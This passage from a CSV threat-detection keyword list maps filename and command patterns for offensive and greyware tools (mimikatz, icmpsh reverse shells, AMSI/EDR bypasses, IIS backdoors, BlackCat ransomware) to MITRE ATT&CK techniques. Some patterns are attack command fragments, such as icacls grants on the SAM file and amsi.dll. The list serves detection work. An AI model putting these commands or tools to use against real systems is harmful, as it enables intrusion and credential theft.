Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra-cobaltstrike*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*Hyperion PE-Crypter*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*hyperion.exe *","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*hyperion_2.0.orig.tar.gz*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Hypnos-main.zip*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*hypobrychium.exe*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" +"*hypobrychium-main*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" +"*i2pinstall*","offensive_tool_keyword","I2P","I2P - The Invisible Internet Project.","T1048.001 - T1568.003","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://geti2p.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*iam__enum_assume_role/default-word-list.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*iammaguire/Gotato*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*ibmiscanner2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*IBurpExtender.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*IBurpExtenderCallbacks.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*icacls ""C:\windows\system32\config\SAM"" /grant*","greyware_tool_keyword","icalcs","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*icacls.exe C:\Windows\System32\amsi.dll /grant administrators:F*","greyware_tool_keyword","icalcs","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A" +"*icebreaker:P@ssword123456*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*icebreaker-master.zip*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*icebreaker-scan.xml*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*IcebreakerSecurity/DelegationBOF*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*IcebreakerSecurity/DelegationBOF*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*IcebreakerSecurity/PersistBOF*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*ice-wzl/wmiexec2*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*ICMP-ReceiveFile.py*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*Icmp-Redirect.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*ICMP-SendFile.py*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*icmpsh.exe*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*icmpsh.exe*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" 
+"*icmpsh.git*","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" +"*icmpsh_m.py*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*icmpsh_m.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-m.*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*icmpsh-m.c*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-m.pl*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-master*","offensive_tool_keyword","icmpsh","Simple reverse ICMP 
shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" +"*icmpsh-s.*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*icmptunnel*","offensive_tool_keyword","icmptunnel","icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. The IP traffic is sent in the 'data' field of ICMP packets.","T1041 - T1001 - T1570","TA0011","N/A","N/A","Defense Evasion","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*icyguider/LightsOut*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" +"*id::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*IDiagnosticProfileUAC.git*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" +"*IDiagnosticProfileUAC-main*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" +"*Idov31/Jormungandr*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*idrac_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*idrac_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*IDSyscall.exe*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*IDSyscall.sln*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*IDSyscall.vcxproj*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*IDSyscall/IDSyscall*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*IDSyscall\IDSyscall*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*ie_execcommand_uaf.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ie_win_fakenotification-clippy*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_win_htapowershell.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_win_missingflash-prettytheft*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*IERMTCBpbnRvIHByb2Nlc3MgOiA=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*if [ -f /tmp/tmpwatch ] * then*","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","N/A","https://linux.die.net/man/8/tmpwatch","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*ifconfig * hw ether *","greyware_tool_keyword","ifconfig","change mac address with ifconfig","T1027","TA0002","N/A","N/A","Defense 
Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*ifconfig * hw ether *:*:*","greyware_tool_keyword","ifconfig","changing mac address with ifconfig","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A" +"*ifconfig -a | grep * | xargs nmap -*","greyware_tool_keyword","nmap","Nmap Scan Every Interface that is Assigned an IP address","T1018 - T1046","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*ifnaibldjfdmaipaddffmgcmekjhiloa*","greyware_tool_keyword","FREE VPN DEWELOPMENT","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*igahhbkcppaollcjeaaoapkijbnphfhb*","greyware_tool_keyword","Social VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*IIS-Backdoor.*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" 
+"*IIS-Raid-master*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*iisreset.exe /stop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ikeforce.py*","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","1","N/A","N/A","3","226","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" +"*ikescan2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ILBypass.ps1*","offensive_tool_keyword","octopus","Octopus is an open source. 
